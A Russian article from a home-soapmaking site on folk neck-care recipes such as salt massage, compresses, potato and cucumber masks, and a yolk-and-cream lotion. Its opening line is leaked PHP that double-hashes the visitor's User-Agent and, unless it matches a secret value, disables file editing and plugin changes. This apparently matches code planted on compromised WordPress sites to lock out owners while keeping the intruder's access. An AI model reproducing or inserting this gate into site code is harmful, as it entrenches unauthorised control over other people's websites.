if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Секреты и рецепты домашней косметики для ухода за кожей шеи | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Секреты и рецепты домашней косметики для ухода за кожей шеи

Шея - визитная карточка женщины. Привычные продукты помогут избавиться от дряхлости и морщин.

Уход за кожей лица – это важ­ная состав­ля­ю­щая цело­го ряда мер для сохра­не­ния моло­до­сти и замед­ле­ния про­цес­сов ста­ре­ния. Жен­щи­ны тра­тят мно­го вре­ме­ни на раз­лич­ные мас­ки и ком­прес­сы для лица и доволь­но часто забы­ва­ют про шею.

Наши мамы и бабуш­ки мно­гие годы исполь­зу­ют рецеп­ты, кото­рые пере­да­ва­лись из поко­ле­ния в поко­ле­ние. Уход за шеей дол­жен быть ком­плекс­ным и вклю­чать в себя очи­ще­ние, пита­ние, а так­же увлаж­не­ние кожи.

Массаж

Перед сном необ­хо­ди­мо тща­тель­но очи­щать не толь­ко кожу лица, но и шеи. После луч­ше все­го сде­лать мас­саж. Для это­го необ­хо­ди­мо взять по сто­ло­вой лож­ке обыч­ной соли и раз­ве­ден­но­го спир­та. Смесь раз­ве­сти в ста­кане теп­лой воды. Поло­тен­це или неболь­шой кусо­чек тка­ни смо­чить в рас­тво­ре, после чего акку­рат­ны­ми рит­мич­ны­ми дви­же­ни­я­ми мас­си­ро­вать шею в направ­ле­нии сни­зу вверх. По жела­нию мож­но доба­вить несколь­ко капель лимон­но­го сока, он помо­жет немно­го освет­лить кожу.

Компрессы

Мно­гие девуш­ки исполь­зу­ют молоч­ко или лосьон для очи­ще­ния по утрам и вече­рам. После них сле­ду­ет накла­ды­вать на несколь­ко минут ком­прес­сы. Сна­ча­ла теп­лый, а затем холод­ный. Повто­рить несколь­ко раз.

От морщин

Для избав­ле­ния от мел­ких мор­щин хоро­шо под­хо­дит сырой кар­то­фель. Мож­но при­кла­ды­вать на шею как его кусоч­ки, так и кожу­ру. Дер­жать минут 10–15. Кожа после такой про­це­ду­ры ста­но­вит­ся глад­кой и шелковистой.

Домашняя косметика

Кос­ме­ти­ка в домаш­них усло­ви­ях доступ­на каж­дой жен­щине. Ингре­ди­ен­ты для ее при­го­тов­ле­ния не нуж­но дол­го искать.

Лосьон для упругости кожи

Издав­на изве­стен лосьон для предот­вра­ще­ния дряб­ло­сти кожи и преж­де­вре­мен­но­го появ­ле­ния мор­щин. Им сле­ду­ет поль­зо­вать­ся еже­днев­но, глав­ное хра­нить на полоч­ке в холо­диль­ни­ке, а не на тум­бе. Для лосьо­на необ­хо­ди­мо жел­ток сме­шать с 0,5 ста­ка­на сли­вок. После доба­вить апель­си­но­вый сок (при­бли­зи­тель­но пол­ста­ка­на) и сто­ло­вую лож­ку водки.

Маска из картофеля

КартофельКар­то­фель – это «нату­раль­ная кос­ме­ти­ка». С его помо­щью мож­но улуч­шить состо­я­ние сво­ей кожи. Напри­мер, при готов­ке пюре сле­ду­ет отло­жить неболь­шую часть. В нее доба­вить сто­ло­вую лож­ку рас­ти­тель­но­го или олив­ко­во­го мас­ла и горя­чим нане­сти на шею, накрыв сал­фет­кой или тка­нью. Подер­жать такую мас­ку 15–20 минут, а затем смыть теп­лой водой.

Питательный крем

Наши бабуш­ки гото­вил крем само­сто­я­тель­но. Для это­го они сме­ши­ва­ли сто­ло­вую лож­ку рас­ти­тель­но­го мас­ла, жел­ток, по 15 мл вазе­ли­на и кам­фор­но­го мас­ла. Перед нане­се­ни­ем для более эффек­тив­но­го дей­ствия пона­до­бит­ся сде­лать горя­чий компресс.

Огуречная маска

Для при­да­ния све­же­сти и глад­ко­сти кожи шеи нуж­но нало­жить огу­реч­ную кожи­цу и накрыть бумаж­ным поло­тен­цем. Подер­жать 5–10 минут.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!